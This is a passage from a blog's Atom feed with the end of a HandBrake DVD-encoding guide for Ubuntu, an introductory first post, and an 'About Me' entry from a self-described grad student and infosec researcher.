&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-3.png"&gt;&lt;img alt="Handbrake Bitrate Selection" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-3.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Once you've configured everything to your liking, just click Start. If
you want to add other movies, click Add To Queue, but do remember that
you can only have one DVD in your drive at a time.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-4.png"&gt;&lt;img alt="Handbrake - Start Encoding" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-4.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I hope this was helpful to someone out there struggling with encoding
DVDs on Linux.&amp;nbsp; If there are any errors in the above post, or anything
you would like my to expand upon, feel free to let me know, I would be
glad to help out anyone who's having trouble. If you are having
problems, &lt;a class="reference external" href="http://ubuntuforums.org/showthread.php?t=992997"&gt;this forum discussion&lt;/a&gt; (ubuntuforums.org) might be of help
as well.&lt;/p&gt;
&lt;p&gt;UPDATE: I have now also posted a guide on &lt;a class="reference external" href="https://spareclockcycles.org/2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede/"&gt;how to restore these rips to
DVDs&lt;/a&gt;. Hope it's useful.&lt;/p&gt;
</summary><category term="dvds"></category><category term="encoding"></category><category term="handbrake"></category><category term="linux"></category><category term="ripping"></category><category term="Ubuntu"></category></entry><entry><title>And So It Begins...</title><link href="https://spareclockcycles.org/2008/12/06/and-so-it-begins.html" rel="alternate"></link><updated>2008-12-06T10:12:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-06:2008/12/06/and-so-it-begins.html</id><summary type="html">&lt;p&gt;Well, it's 4 in the morning, and here I am starting a blog. Really
should get to bed soon, but I feel the (not so) strange urge to start
writing. So here I am. I've wanted to start a blog for awhile now, but
I've never really gotten up the time or energy to do so. Guess there's
no better time than right now.&lt;/p&gt;
&lt;p&gt;I'm mainly creating this blog as a place to voice my completely
insignificant thoughts on what matters to me. I considered listing them
here, but a.) I don't want to pigeonhole my focus, and b.) it's hard to
break all of those things up into categories, as they overlap pretty
often. So for now, we'll just say this is a technology blog with a
smattering of everything else mixed in, and see what comes from there.&lt;/p&gt;
&lt;p&gt;Well, they say they say a journey of a thousand miles begins with a
single step. I think I will make mine towards my bed. Maybe next time I
will post with something of a little more substance. Adios.&lt;/p&gt;
</summary><category term="beginning"></category><category term="n00b"></category></entry><entry><title>About Me (And This Blog)</title><link href="https://spareclockcycles.org/2008/12/06/about-me-and-this-blog.html" rel="alternate"></link><updated>2008-12-06T09:56:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-06:2008/12/06/about-me-and-this-blog.html</id><summary type="html">&lt;p&gt;Grad student by day, infosec researcher by night. I spend most of my
&amp;nbsp;time playing with whatever shiny new technology has most recently
caught my eye, which tends to keep me pretty constantly occupied.&amp;nbsp;This
blog exists as a way for me to organize the rather random projects I
find work on from day to day, as well as interesting things I find along
the way. Most of it is security related, but I still post on other
things from time to time when I feel the need. I hope it's also useful
to other people out there interested in similar things, and definitely
welcome any and all feedback.&lt;/p&gt;
&lt;p&gt;If you really want to read every inane thing I have ever decided to
think, you can follow me on Twitter: &lt;a class="reference external" href="http://twitter.com/_supernothing"&gt;http://twitter.com/_supernothing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you need a more useful way to contact me, hit me up at supernothing
4T spareclockcycles D0T org, either by email or Google chat. You can
also find me on Freenode from time to time as supernothing. I should get
back to you pretty quickly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;&amp;quot;Earthlings went on being friendly, when they should have been thinking instead. And even when they built computers to do some thinking for them, they designed them not so much for wisdom as for friendliness. So they were doomed.&amp;quot;  --Kurt Vonnegut, &lt;em&gt;Breakfast of Champions&lt;/em&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
</summary></entry></feed>